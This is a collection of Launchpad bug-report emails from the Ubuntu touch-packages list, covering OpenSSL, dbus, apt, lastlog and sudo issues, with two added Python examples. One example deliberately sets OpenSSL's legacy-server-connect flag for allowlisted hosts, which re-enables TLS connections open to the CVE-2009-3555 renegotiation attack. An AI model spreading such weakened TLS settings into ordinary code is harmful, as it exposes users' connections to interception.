https://bugs.launchpad.net/ubuntu/+source/unattended-upgrades/+bug/1963751/+subscriptions




[Touch-packages] [Bug 1963834] Re: openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED]

2022-03-07 Thread Seth Arnold
It looks like this was added in:

https://github.com/openssl/openssl/commit/72d2670bd21becfa6a64bb03fa55ad82d6d0c0f3

in order to address servers that have not yet been updated for
CVE-2009-3555.

It's possible to add a flag at the C level to connect insecurely,
SSL_OP_LEGACY_SERVER_CONNECT, but I don't see this added to python:

https://bugs.python.org/issue44888
https://github.com/python/cpython/pull/27776

Thus it might not be easily reachable from Python programs.

Best would be to update the remote server to address CVE-2009-3555 (it
might also be known as "support RFC 5746"). I'm not sure what to suggest
for programs written in Python.

Thanks

** Bug watch added: Python Roundup #44888
   http://bugs.python.org/issue44888

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3555

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1963834

Title:
  openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED]

Status in openssl package in Ubuntu:
  New

Bug description:
  Description:Ubuntu Jammy Jellyfish (development branch)
  Release:22.04

  openssl:
Installé : 3.0.1-0ubuntu1
Candidat : 3.0.1-0ubuntu1
   Table de version :
   *** 3.0.1-0ubuntu1 500
  500 http://ca.archive.ubuntu.com/ubuntu jammy/main amd64 Packages
  100 /var/lib/dpkg/status

  Using Ubuntu 22.04, I now get the following error message when
  attempting to connect to our office VPN using "gp-saml-gui
  (https://github.com/dlenski/gp-saml-gui)" :

  #
  dominique@Doombuntu:~$ .local/bin/gp-saml-gui  server_url
  Looking for SAML auth tags in response to https://server_url/global-protect/prelogin.esp...
  usage: gp-saml-gui [-h] [--no-verify] [-C COOKIES | -K] [-g | -p] [-c CERT] [--key KEY] [-v | -q] [-x | -P | -S] [-u] [--clientos {Windows,Linux,Mac}] [-f EXTRA] server [openconnect_extra ...]
  gp-saml-gui: error: SSL error: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation disabled (_ssl.c:997)
  #
  #
  #

  gp-saml-gui uses the Python module requests.
  Using the Python IDE, I can get the same results:

  #
  >>> r = requests.get('https://server_url')
  Traceback (most recent call last):
    File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 699, in urlopen
      httplib_response = self._make_request(
    File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 382, in _make_request
      self._validate_conn(conn)
    File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 1012, in _validate_conn
      conn.connect()
    File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 411, in connect
      self.sock = ssl_wrap_socket(
    File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 449, in ssl_wrap_socket
      ssl_sock = _ssl_wrap_socket_impl(
    File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 493, in _ssl_wrap_socket_impl
      return ssl_context.wrap_socket(sock, server_hostname=server_hostname)
    File "/usr/lib/python3.10/ssl.py", line 512, in wrap_socket
      return self.sslsocket_class._create(
    File "/usr/lib/python3.10/ssl.py", line 1070, in _create
      self.do_handshake()
    File "/usr/lib/python3.10/ssl.py", line 1341, in do_handshake
      self._sslobj.do_handshake()
  ssl.SSLError: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation disabled (_ssl.c:997)

  During handling of the above exception, another exception occurred:

  Traceback (most recent call last):
    File "/usr/lib/python3/dist-packages/requests/adapters.py", line 439, in send
      resp = conn.urlopen(
    File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 755, in urlopen
      retries = retries.increment(
    File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 574, in increment
      raise MaxRetryError(_pool, url, error or ResponseError(cause))
  urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='server_url', port=443): Max retries exceeded with url: / (Caused by SSLError(SSLError(1, '[SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation disabled (_ssl.c:997)')))

  During handling of the above exception, another exception occurred:

  Traceback (most recent call last):
    File "", line 1, in 
    File "/usr/lib/python3/dist-packages/requests/api.py", line 76, in get
      return request('get', url, params=params, **kwargs)
    File "/usr/lib/python3/dist-packages/requests/api.py", line 61, in request
      return session.request(method=method, url=url, **kwargs)
    File "/usr/lib/python3/dist-packages/requests/sessions.py", line 542, in request
      resp = self.send(prep, **send_kwargs)
    File "/usr/lib/python3/dist-packages/requests/sessions.py", line 655, in send
      r = adapter.send(request, **kwargs)
File 
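
The SSL_OP_LEGACY_SERVER_CONNECT flag named in the reply above, as an added example that is not part of the original thread or of OpenSSL/CPython code: it keeps the flag cleared by default and scopes the exception to an explicit allowlist until the remote server supports RFC 5746. Python 3.12 and later export the constant as ssl.OP_LEGACY_SERVER_CONNECT; the 0x4 fallback for older interpreters and the host names are assumptions made for this example.

```python
import ssl

# OpenSSL defines SSL_OP_LEGACY_SERVER_CONNECT as bit 2 (0x4). Python 3.12+
# exports it as ssl.OP_LEGACY_SERVER_CONNECT; the literal fallback for older
# interpreters is an assumption about the linked OpenSSL headers.
OP_LEGACY_SERVER_CONNECT = int(getattr(ssl, "OP_LEGACY_SERVER_CONNECT", 0x4))

# Constructed allowlist: servers known to lack RFC 5746 support, pending a fix.
LEGACY_HOSTS = frozenset({"vpn.example.internal"})


def allows_legacy_server(ctx):
    """True if this context will connect to servers without RFC 5746 support."""
    return bool(int(ctx.options) & OP_LEGACY_SERVER_CONNECT)


def strict_context():
    """Default client context with the legacy bit cleared explicitly.

    OpenSSL 1.1.1 sets the bit by default and OpenSSL 3.0 does not, so
    clearing it gives the same behaviour regardless of the linked library.
    """
    ctx = ssl.create_default_context()
    ctx.options = int(ctx.options) & ~OP_LEGACY_SERVER_CONNECT
    return ctx


def legacy_exception_context():
    """Context for one unpatched server; certificate checks stay enabled."""
    ctx = ssl.create_default_context()
    ctx.options = int(ctx.options) | OP_LEGACY_SERVER_CONNECT
    return ctx


def context_for(host, legacy_hosts=LEGACY_HOSTS):
    """Pick the weakened context only for hosts on the explicit allowlist."""
    if host.lower().rstrip(".") in legacy_hosts:
        return legacy_exception_context()
    return strict_context()


def audit(hosts, legacy_hosts=LEGACY_HOSTS):
    """Map each host to whether it would be contacted with the legacy flag."""
    return {h: allows_legacy_server(context_for(h, legacy_hosts)) for h in hosts}


if __name__ == "__main__":
    report = audit(["www.example.org", "vpn.example.internal"])
    for host, legacy in report.items():
        state = "ENABLED" if legacy else "disabled"
        print(f"{host}: legacy server connect {state}")
```

The returned context is passed to wrap_socket() or to an HTTP client that accepts an SSLContext; the allowlist entry is removed once the server is updated.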

[Touch-packages] [Bug 1962036] Re: dbus was stopped during today's jammy update, breaking desktop

2022-02-23 Thread Seth Arnold
This reminds me a lot of https://bugs.launchpad.net/bugs/1871538

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dbus in Ubuntu.
https://bugs.launchpad.net/bugs/1962036

Title:
  dbus was stopped during today's jammy update, breaking desktop

Status in dbus package in Ubuntu:
  New

Bug description:
  Impact: logind stopped, so desktop stopped, ssh stopped, got no getty.
  Had to hard reset.

  Today's jammy upgrade stopped dbus at 19:46:27

  Feb 23 19:46:27 jak-t480s systemd[1]: Stopping D-Bus System Message
  Bus...

  This should not happen. I don't know which package caused this, but
  presumably dbus should not be stoppable in the first place.


  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: dbus 1.12.20-2ubuntu3
  ProcVersionSignature: Ubuntu 5.15.0-22.22-generic 5.15.19
  Uname: Linux 5.15.0-22-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.11-0ubuntu78
  Architecture: amd64
  CasperMD5CheckResult: unknown
  CurrentDesktop: GNOME
  Date: Wed Feb 23 20:03:41 2022
  InstallationDate: Installed on 2018-03-14 (1442 days ago)
  InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Alpha amd64 (20180313)
  RebootRequiredPkgs: Error: path contained symlinks.
  SourcePackage: dbus
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1962036/+subscriptions




[Touch-packages] [Bug 1960863] Re: armv8 paca: poly1305 users see segfaults when pointer authentication in use on AWS Graviton 3 instances

2022-02-16 Thread Seth Arnold
None of us are ARM architecture experts but the upstream code nearby
doesn't look like it's changed since this patch was introduced:

https://github.com/openssl/openssl/blame/master/crypto/poly1305/asm/poly1305-armv8.pl
https://github.com/openssl/openssl/blame/OpenSSL_1_1_1-stable/crypto/poly1305/asm/poly1305-armv8.pl
https://github.com/openssl/openssl/blame/openssl-3.0/crypto/poly1305/asm/poly1305-armv8.pl

The debdiff looks like it makes sense to me, and it all feels pretty
plausible.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1960863

Title:
  armv8 paca: poly1305 users see segfaults when pointer authentication
  in use on AWS Graviton 3 instances

Status in openssl package in Ubuntu:
  Fix Released
Status in openssl source package in Focal:
  In Progress

Bug description:
  [Impact]

  Support for hardware pointer authentication for armv8 systems was
  merged in openssl 1.1.1f, but it contains a bug in the implementation
  for poly1305 message authenticated code routines, which causes the
  calling program to fail pointer authentication, which causes the
  program to crash with a segmentation fault.

  You can easily test it by accessing any website that uses poly1305.
  There is no workaround except to use a different MAC.

  [Testcase]

  This bug applies to armv8 systems which support pointer
  authentication. Start an armv8 instance, such as a c7g graviton 3
  instance on AWS, and make sure the paca flag is present in lscpu:

  $ grep paca /proc/cpuinfo
  Features : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp cpuid asimdrdm jscvt fcma lrcpc dcpop sha3 sm3 sm4 asimddp sha512 sve asimdfhm dit uscat ilrcpc flagm ssbs paca pacg dcpodp svei8mm svebf16 i8mm bf16 dgh rng

  Next, attempt to connect to any website that uses poly1305 MAC.

  $ curl https://services.gradle.org/distributions/gradle-7.2-bin.zip --output gradle-7.2.bin
  % Total % Received % Xferd Average Speed Time Time Time Current
  Dload Upload Total Spent Left Speed
  0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0Segmentation fault (core dumped)

  There is a test package available in the following ppa:

  https://launchpad.net/~mruffell/+archive/ubuntu/sf327917-test

  Install it, and poly1305 operations will no longer segfault.

  [Where problems could occur]

  The patch changes the order of operations for loading the SP and
  checking the AUTIASP against it, from checking the AUTIASP against
  nothing then loading the correct SP to check with, to the correct
  loading the SP and then checking the AUTIASP against the SP.

  This only changes one code path for armv8 systems, and other
  architectures are not affected. This is also only limited to poly1305
  MAC.

  If a regression were to occur, it would only affect users of poly1305
  MAC on armv8 with pacs support.

  [Other info]

  The fix landed upstream in openssl 1.1.1i with the following commit:

  commit 5795acffd8706e1cb584284ee5bb3a30986d0e75
  Author: Ard Biesheuvel 
  Date:   Tue Oct 27 18:02:40 2020 +0100
  Subject: crypto/poly1305/asm: fix armv8 pointer authentication
  Link: https://github.com/openssl/openssl/commit/5795acffd8706e1cb584284ee5bb3a30986d0e75

  This commit is already present in Impish onward. Only Focal needs the
  fix.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1960863/+subscriptions




[Touch-packages] [Bug 1960264] Re: 503 errors for Jammy PPAs

2022-02-11 Thread Seth Arnold
Are there any log entries in your proxy that might help explain what's
happening?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apt in Ubuntu.
https://bugs.launchpad.net/bugs/1960264

Title:
  503 errors for Jammy PPAs

Status in apt package in Ubuntu:
  New

Bug description:
  For Jammy - all PPAs seem to fail - the main archive is ok

   503  Connection closed, check DlMaxRetries [IP: 127.0.0.1 3142]
  Err:12 http://ppa.launchpad.net/ubuntubudgie-dev/budgie-extras-daily/ubuntu jammy/main amd64 budgie-window-shuffler amd64 1.3.0+202202062047~ubuntu22.04.1
    503  Connection closed, check DlMaxRetries [IP: 127.0.0.1 3142]
  Err:6 http://ppa.launchpad.net/ubuntubudgie-dev/budgie-extras-daily/ubuntu jammy/main amd64 budgie-rotation-lock-applet all 1.3.0+202202062047~ubuntu22.04.1
    503  Connection closed, check DlMaxRetries [IP: 127.0.0.1 3142]
  Fetched 114 kB in 7s (15.8 kB/s)
  E: Failed to fetch http://ppa.launchpad.net/ubuntubudgie-dev/budgie-extras-daily/ubuntu/pool/main/b/budgie-extras/budgie-quicknote-applet_1.3.0%2b202202062047%7eubuntu22.04.1_amd64.deb
  503  Connection closed, check DlMaxRetries [IP: 127.0.0.1 3142]
  E: Failed to fetch http://ppa.launchpad.net/ubuntubudgie-dev/budgie-extras-daily/ubuntu/pool/main/b/budgie-extras/budgie-recentlyused-applet_1.3.0%2b202202062047%7eubuntu22.04.1_amd64.deb
  503  Connection closed, check DlMaxRetries [IP: 127.0.0.1 3142]

  ppa:ubuntubudgie-dev/budgie-extras-daily

  The same PPA for impish & focal work just fine

  Thoughts?

  

  Continually running repeatedly sudo apt update && sudo apt
  dist-upgrade -y eventually forces the downloads to occur ok and the
  upgrades can then be installed ok

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: apt 2.3.15
  ProcVersionSignature: Ubuntu 5.15.0-18.18-generic 5.15.12
  Uname: Linux 5.15.0-18-generic x86_64
  ApportVersion: 2.20.11-0ubuntu76
  Architecture: amd64
  CasperMD5CheckResult: pass
  CurrentDesktop: Budgie:GNOME
  Date: Mon Feb  7 18:47:47 2022
  InstallationDate: Installed on 2022-01-29 (8 days ago)
  InstallationMedia: Ubuntu-Budgie 22.04 LTS "Jammy Jellyfish" - Alpha amd64 (20220129)
  SourcePackage: apt
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apt/+bug/1960264/+subscriptions




[Touch-packages] [Bug 1959160] Re: package systemd 245.4-4ubuntu3.11 failed to install/upgrade: no se pudieron copiar los datos extraídos de './bin/systemctl' a '/bin/systemctl.dpkg-new': fin de fiche

2022-01-27 Thread Seth Arnold
Thank you for taking the time to report this bug and helping to make
Ubuntu better.  Reviewing your dmesg attachment to this bug report it
seems that there may be a problem with your hardware.  I'd recommend
performing a back up and then investigating the situation.  Measures you
might take include checking cable connections and using software tools
to investigate the health of your hardware.  In the event that it is not
in fact an error with your hardware please set the bug's status back to
New.  Thanks and good luck!

** Changed in: systemd (Ubuntu)
   Status: New => Invalid

** Changed in: systemd (Ubuntu)
   Importance: Undecided => Low

** Tags added: hardware-error

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1959160

Title:
  package systemd 245.4-4ubuntu3.11 failed to install/upgrade: no se
  pudieron copiar los datos extraídos de './bin/systemctl' a
  '/bin/systemctl.dpkg-new': fin de fichero o de flujo inesperado

Status in systemd package in Ubuntu:
  Invalid

Bug description:
  I can't use Ubuntu's store

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: systemd 245.4-4ubuntu3.11
  ProcVersionSignature: Ubuntu 5.13.0-27.29~20.04.1-generic 5.13.19
  Uname: Linux 5.13.0-27-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.18
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Wed Jan 26 23:23:33 2022
  ErrorMessage: no se pudieron copiar los datos extraídos de './bin/systemctl' a '/bin/systemctl.dpkg-new': fin de fichero o de flujo inesperado
  InstallationDate: Installed on 2022-01-27 (0 days ago)
  InstallationMedia: Ubuntu 20.04.3 LTS "Focal Fossa" - Release amd64 (20210819)
  MachineType: LENOVO 2466RA9
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.13.0-27-generic root=UUID=aeba2232-8f7b-4fcc-bc3a-7a15409cdcc0 ro quiet splash vt.handoff=7
  Python3Details: /usr/bin/python3.8, Python 3.8.10, python3-minimal, 3.8.2-0ubuntu2
  PythonDetails: N/A
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3
   apt  2.0.6
  SourcePackage: systemd
  SystemdDelta:
   [EXTENDED]   /usr/lib/systemd/system/rc-local.service → /usr/lib/systemd/system/rc-local.service.d/debian.conf
   [EXTENDED]   /usr/lib/systemd/system/user@.service → /usr/lib/systemd/system/user@.service.d/timeout.conf

   2 overridden configuration files found.
  Title: package systemd 245.4-4ubuntu3.11 failed to install/upgrade: no se pudieron copiar los datos extraídos de './bin/systemctl' a '/bin/systemctl.dpkg-new': fin de fichero o de flujo inesperado
  UpgradeStatus: No upgrade log present (probably fresh install)
  dmi.bios.date: 09/18/2019
  dmi.bios.release: 2.76
  dmi.bios.vendor: LENOVO
  dmi.bios.version: G3ETB6WW(2.76)
  dmi.board.asset.tag: Not Available
  dmi.board.name: 2466RA9
  dmi.board.vendor: LENOVO
  dmi.board.version: Win8 Pro DPK TPG
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Not Available
  dmi.modalias: dmi:bvnLENOVO:bvrG3ETB6WW(2.76):bd09/18/2019:br2.76:svnLENOVO:pn2466RA9:pvrThinkPadL430:rvnLENOVO:rn2466RA9:rvrWin8ProDPKTPG:cvnLENOVO:ct10:cvrNotAvailable:skuLENOVO_MT_2466:
  dmi.product.family: ThinkPad L430
  dmi.product.name: 2466RA9
  dmi.product.sku: LENOVO_MT_2466
  dmi.product.version: ThinkPad L430
  dmi.sys.vendor: LENOVO

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1959160/+subscriptions




[Touch-packages] [Bug 1273258] Re: Hundreds of dbus-daemon processes

2022-01-24 Thread Seth Arnold
Pavel, OMJ, maybe execsnoop-bpfcc from bpfcc-tools can help spot what
program is starting your dbus-daemons?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dbus in Ubuntu.
https://bugs.launchpad.net/bugs/1273258

Title:
  Hundreds of dbus-daemon processes

Status in dbus package in Ubuntu:
  Confirmed

Bug description:
  I find a growing number of root owned dbus-daemon processes.
  Eventually, this results in a 'too many processes' error preventing
  something to fork, e.g. a login.

  They get created by batches of 4, every 30 minutes on my box.
  My box is a puppet client, so that these 30 minutes are not in a local
  cron tab.
  The pids are 11 units apart (when the box is otherwise idle).
  The command line is:
  //bin/dbus-daemon --fork --print-pid 4 --print-address 6 --session

  ~# ps -fu root | grep dbus-daemon | grep -v grep | tail -8
  root 17509 1  0 11:25 ?00:00:00 //bin/dbus-daemon --fork --print-pid 4 --print-address 6 --session
  root 17520 1  0 11:25 ?00:00:00 //bin/dbus-daemon --fork --print-pid 4 --print-address 6 --session
  root 17531 1  0 11:25 ?00:00:00 //bin/dbus-daemon --fork --print-pid 4 --print-address 6 --session
  root 17542 1  0 11:25 ?00:00:00 //bin/dbus-daemon --fork --print-pid 4 --print-address 6 --session
  root 17972 1  0 11:55 ?00:00:00 //bin/dbus-daemon --fork --print-pid 4 --print-address 6 --session
  root 17983 1  0 11:55 ?00:00:00 //bin/dbus-daemon --fork --print-pid 4 --print-address 6 --session
  root 17994 1  0 11:55 ?00:00:00 //bin/dbus-daemon --fork --print-pid 4 --print-address 6 --session
  root 18005 1  0 11:55 ?00:00:00 //bin/dbus-daemon --fork --print-pid 4 --print-address 6 --session

  I reported this first to https://bugs.freedesktop.org/show_bug.cgi?id=74114
  and was told to report it to ubuntu instead.
  Here were some additional comments:

  The symptoms you described probably mean that something running as
  root is either running /usr/bin/dbus-launch, or attempting to access a
  D-Bus session via the autolaunch: transport while under a transient
  X11 session, 4 times every 30 minutes.

  If this machine does not intentionally run an X11 GUI or a D-Bus
  session, uninstalling the dbus-x11 package or making
  /usr/bin/dbus-launch non-executable might work around this. Don't do
  that if you use an X11 GUI environment, though.

  Since 1.4.8, dbus autolaunch has only been effective when DISPLAY is
  set and non-empty, so if this is autolaunch, an X11 session must be
  involved somehow.

  ProblemType: Bug
  DistroRelease: Ubuntu 12.04
  Package: dbus 1.4.18-1ubuntu1.4
  ProcVersionSignature: Ubuntu 3.2.0-58.88-generic 3.2.53
  Uname: Linux 3.2.0-58-generic x86_64
  NonfreeKernelModules: nvidia
  ApportVersion: 2.0.1-0ubuntu17.6
  Architecture: amd64
  Date: Mon Jan 27 14:51:19 2014
  MarkForUpload: True
  ProcEnviron:
   SHELL=/bin/bash
   PATH=(custom, no user)
   LANG=en_US.UTF-8
  SourcePackage: dbus
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1273258/+subscriptions




[Touch-packages] [Bug 1668944] Re: The _apt user ignores group membership.

2022-01-20 Thread Seth Arnold
Changing away from 'nogroup' would be good, that's for NFS use (similar
to 'nobody').

Using ACLs to grant the _apt user permission to work with specific files
sounds good to me. Perhaps not all editors know to maintain those when
writing new files with the same name, or perhaps know to fall back to
non-atomic file update tools in order to maintain those...

But it'd be ideal from apt's perspective, and easier than trying to
manage supplementary groups in sandboxed processes.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apt in Ubuntu.
https://bugs.launchpad.net/bugs/1668944

Title:
  The _apt user ignores group membership.

Status in apt package in Ubuntu:
  Invalid

Bug description:
  Actually I had the same problem described in
  http://askubuntu.com/questions/773955/apt-get-ssl-client-certificate-not-working-on-16-04-error-while-reading-file
  I want to use client certificates with apt. But I don't want to make
  them world readable in order to make apt working. So I created a group
  'ssl-cert' and changed the group ownership of the ssl cert files to
  match this group. I also added the _apt user to the ssl-cert group.

  Then I tried to open these files as user '_apt' in bash (su -s
  /bin/bash _apt) which works well.

  But if I run: "apt-get -o "Debug::Acquire::https=true" update" I still
  get the following error:
  * error reading ca cert file /etc/certs/mycert/ca.pem (Error while reading file.)
  * Closing connection 26

  So my guess is that apt somehow ignores the ssl-cert membership.

  Possible workarounds:
  - make ssl client cert world readable
  - change owner ssl client cert to _apt
  - change main group of _apt user from 'nogroup' to 'ssl-cert'
  - set APT::Sandbox::User "root"; in apt.conf.d

  Neither of them is pretty.
  Maybe this is a wanted behavior, then just suggest how to fix the issue
  in nice way.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apt/+bug/1668944/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1707645] Re: system with high numbered uids has huge sparse /var/log/lastlog

2022-01-06 Thread Seth Arnold
Oliver, from the lastlog(8) manpage:

   The lastlog file is a database which contains info on the
   last login of each user. You should not rotate it. It is a
   sparse file, so its size on the disk is usually much smaller
   than the one shown by "ls -l" (which can indicate a really
   big file if you have in passwd users with a high UID). You
   can display its real size with "ls -s".

http://manpages.ubuntu.com/manpages/focal/man8/lastlog.8.html

If you're using a filesystem that can't handle sparse files it might be
best to not use lastlog.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pam in Ubuntu.
https://bugs.launchpad.net/bugs/1707645

Title:
  system with high numbered uids has huge sparse /var/log/lastlog

Status in pam package in Ubuntu:
  Confirmed
Status in shadow package in Ubuntu:
  Confirmed
Status in util-linux package in Ubuntu:
  Confirmed

Bug description:
  I was investigating the use of a single high UID user (ie, 20)
  and discovered that /var/log/lastlog grew to an enormously large
  sparse file:

  $ ls -lh /var/log/lastlog 
  -rw-rw-r-- 1 root utmp 544G Jul 27 12:35 /var/log/lastlog

  The file is actually quite small though:
  $ ls -lh --size /var/log/lastlog 
  56K -rw-rw-r-- 1 root utmp 544G Jul 27 12:35 /var/log/lastlog

  On a standalone system, this is possibly not a problem since it is
  highly unlikely that a system will have 2 billion users, but this is
  confirmed to wreak havoc on rsync backups.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/pam/+bug/1707645/+subscriptions
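
Why one high UID produces a huge apparent size, as an added example that is not part of the original thread or of the shadow/pam code: lastlog is indexed by UID, so a record is written at offset UID times the record size and everything before it is a hole. The 292-byte layout assumes glibc's struct lastlog on x86_64; the UID, tty, host and timestamp are constructed.

```python
import errno
import os
import struct
import tempfile
import time

# Assumed layout (glibc struct lastlog on x86_64):
# int32 ll_time, char ll_line[32], char ll_host[256] -> 292 bytes per UID.
LASTLOG_RECORD = struct.Struct("=i32s256s")


def write_login(path, uid, tty, host, when=None):
    """Write one record at offset uid * record size, as lastlog is indexed."""
    record = LASTLOG_RECORD.pack(int(when or time.time()),
                                 tty.encode(), host.encode())
    mode = "r+b" if os.path.exists(path) else "w+b"
    with open(path, mode) as fh:
        fh.seek(uid * LASTLOG_RECORD.size)   # seeking past EOF leaves a hole
        fh.write(record)
        fh.flush()
        os.fsync(fh.fileno())


def read_login(path, uid):
    """Return (time, tty, host) for uid, or None if the slot is empty."""
    with open(path, "rb") as fh:
        fh.seek(uid * LASTLOG_RECORD.size)
        raw = fh.read(LASTLOG_RECORD.size)
    if len(raw) < LASTLOG_RECORD.size:
        return None
    when, tty, host = LASTLOG_RECORD.unpack(raw)
    if when == 0:                            # holes read back as zero bytes
        return None
    return when, tty.rstrip(b"\0").decode(), host.rstrip(b"\0").decode()


def sizes(path):
    """Apparent size ("ls -l") and allocated bytes ("ls -s"), POSIX only."""
    st = os.stat(path)
    return st.st_size, st.st_blocks * 512


def data_extents(path):
    """List (start, stop) byte ranges that hold data, skipping holes."""
    extents = []
    fd = os.open(path, os.O_RDONLY)
    try:
        end = os.fstat(fd).st_size
        offset = 0
        while offset < end:
            try:
                start = os.lseek(fd, offset, os.SEEK_DATA)
            except OSError as exc:
                if exc.errno == errno.ENXIO:  # nothing but a hole remains
                    break
                raise
            stop = os.lseek(fd, start, os.SEEK_HOLE)
            extents.append((start, stop))
            offset = stop
    finally:
        os.close(fd)
    return extents


def demo(uid=1_000_000):
    """Create a lastlog-style file with a single high-UID login."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "lastlog")
        write_login(path, uid, "pts/0", "192.0.2.10", when=1501158900)
        apparent, allocated = sizes(path)
        return {
            "apparent": apparent,
            "allocated": allocated,
            "record": read_login(path, uid),
            "never_logged_in": read_login(path, 5),
            "extents": data_extents(path),
        }


if __name__ == "__main__":
    result = demo()
    print(f"apparent size : {result['apparent']:>12} bytes")
    print(f"allocated     : {result['allocated']:>12} bytes")
    print(f"data extents  : {result['extents']}")
```

A backup tool that reads the file byte by byte processes the apparent size; one that honours holes only touches the reported data extents.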




[Touch-packages] [Bug 288964] Re: sudo does not work with unbinding usb interface from usbhid driver

2021-12-14 Thread Seth Arnold
ALinuxUser, Xiaofan Chen's example was unbinding the usbhid driver via
the /sys/bus/usb/drivers/usbhid/unbind control file -- yours is using
/sys/bus/usb/drivers/usb/unbind instead. You probably have to use the
control file that corresponds to the driver your device is using. (Check
lsusb -t output.)

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to sudo in Ubuntu.
https://bugs.launchpad.net/bugs/288964

Title:
  sudo does not work with unbinding usb interface from usbhid driver

Status in sudo package in Ubuntu:
  Invalid

Bug description:
  I was looking for a way to dump the HID report descriptor under Linux.
  For that purpose, I need to detach the kernel usbhid driver from the
  HID interfaces.

  More detail in libusb mailing list archive.
  http://www.nabble.com/How-to-dump-HID-report-descriptor-under-Linux-td19609562.html

  mcuee@Ubuntu804:~$ uname -a
  Linux Ubuntu804 2.6.24-21-generic #1 SMP Mon Aug 25 17:32:09 UTC 2008 i686 GNU/Linux

  mcuee@Ubuntu804:/sys/bus/usb/drivers/usbhid$ lsusb
  Bus 001 Device 007: ID 04f2:0760 Chicony Electronics Co., Ltd
  Bus 001 Device 006: ID :0005
  Bus 001 Device 005: ID 046d:c054 Logitech, Inc.
  Bus 001 Device 004: ID 14c0:0008
  Bus 001 Device 003: ID 1947:0033
  Bus 001 Device 002: ID 058f:9360 Alcor Micro Corp. 8-in-1 Media Card Reader
  Bus 001 Device 001: ID :
  Bus 002 Device 001: ID :

  mcuee@Ubuntu804:/sys/bus/usb/drivers/usbhid$ ls
  1-3:1.0  1-5:1.0  1-7:1.0  1-7:1.1  bind  module  new_id  uevent  unbind

  So far so good. But then there is an error thereafter. Maybe this is an
  Ubuntu-specific problem.

  mcuee@Ubuntu804:/sys/bus/usb/drivers/usbhid$ sudo echo -n 1-7:1.0 >unbind
  bash: unbind: Permission denied
  mcuee@Ubuntu804:/sys/bus/usb/drivers/usbhid$ sudo echo -n 1-7:1.1 >unbind
  bash: unbind: Permission denied 

  It turns out that I need to enable root to be able to do the job.
  mcuee@Ubuntu804:/sys/bus/usb/drivers/usbhid$ sudo passwd root
  [sudo] password for mcuee:
  Enter new UNIX password:
  Retype new UNIX password:
  passwd: password updated successfully
  mcuee@Ubuntu804:/sys/bus/usb/drivers/usbhid$ ls
  1-3:1.0  1-5:1.0  1-7:1.0  1-7:1.1  bind  module  new_id  uevent  unbind

  mcuee@Ubuntu804:/sys/bus/usb/drivers/usbhid$ su -
  Password:
  root@Ubuntu804:~# cd /sys/bus/usb/drivers/usbhid/
  root@Ubuntu804:/sys/bus/usb/drivers/usbhid# ls
  1-3:1.0  1-5:1.0  1-7:1.0  1-7:1.1  bind  module  new_id  uevent  unbind
  root@Ubuntu804:/sys/bus/usb/drivers/usbhid# echo -n 1-7:1.0 >unbind
